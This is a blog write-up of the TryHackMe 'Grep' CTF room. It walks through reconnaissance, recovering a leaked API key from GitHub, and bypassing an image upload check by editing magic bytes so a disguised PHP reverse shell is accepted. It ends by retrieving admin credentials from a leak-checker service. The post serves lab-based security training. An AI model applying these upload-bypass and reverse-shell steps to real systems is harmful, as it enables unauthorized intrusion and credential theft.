305 words
2 minutes
Grep Writeup - TryHackMe
2023-08-30
TryHackMe
TryHackMe
/
OSINT
/
Recon

This Grep challenge tests your reconnaissance and OSINT skills using a vulnerable machine hosted on TryHackMe.

Start this room by hitting the “deploy” button. Once deployed, you are assigned an IP address.

Below is the Nmap command used for scanning:

nmap_comands

Nmap Command:

Terminal window
sudo nmap -n -A -Pn --min-parallelism 100 -T5 -p- <IP>

The scan reveals three open ports.

nmapscan_result

Visit port 80 and you’ll see the default Apache page. Directory busting yields no useful results.

default_apachepage

On port 443, a certificate error is displayed.

certificate_error

Inspect the certificate and find a clue: the domain grep.thm.

certificate_info

Add an entry to /etc/hosts mapping the IP to grep.thm.

configure

Ping the domain to confirm it’s properly configured.

ping

Now browse to https://grep.thm.

page

Attempt to register an account.

register_account

An error appears: “Invalid or expired API key.”

error

Search GitHub for “SearchME grep.thm”.

github

In the repo, locate register.php and find the removed API key.

remove_key

The API key is: ffe60ecaa8bba2f12b43d1a4b15b8f39

api_key

Intercept the registration request in Burp Suite, replace the API key with the correct one, and forward it.

burp_intercept

Registration is successful.

successfully_register

Log in to your account and retrieve the first flag.

flag

Flag 1: THM{4e****************************bb}

Check the GitHub repo again and locate upload.php. It validates files using hex signatures (JPG, PNG, GIF).

code_upload,php

Visit the upload.php page.

upload.php

Use Pentestmonkey’s PHP Reverse Shell and edit it with your IP and port.

reverse_hell

Rename the file with .jpg extension and adjust its hex signature to match a real image.

change_name

Edit magic bytes using a hex editor.

hexvalue_editor

Change the hex values as required.

captionless image

Upload the file.

file_uploading

Successful upload confirmation appears.

file_uploaded

Access the uploaded file to get a reverse shell.

upload_folder

TIP

If you don’t receive a reverse shell, move the <?php tag in the script after a comment line at the starting. This avoids corruption from hex editing the first line.

With shell access, locate users.sql containing admin credentials.

admin_email

Admin Email: admin@searchme2023cms.grep.thm

Navigate to the leakchecker directory and find two files. One checks for leaked credentials.

leak_checker

Leak checker hostname: leakchecker.grep.thm

Add this subdomain to /etc/hosts.

captionless image

Go to https://leakchecker.grep.thm, enter the admin email, and the password is revealed.

emailleak_checker

Admin Password: a**************!

Grep Writeup - TryHackMe
https://blog.hanzalaghayasabbasi.com/posts/grep/
Author
Hanzala Ghayas Abbasi
Published at
2023-08-30
License
CC BY-NC-SA 4.0
Basic Pentesting Writeup - TryHackMe
Lesson Learned Writeup - TryHackMe
© 2025 Hanzala Ghayas Abbasi. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari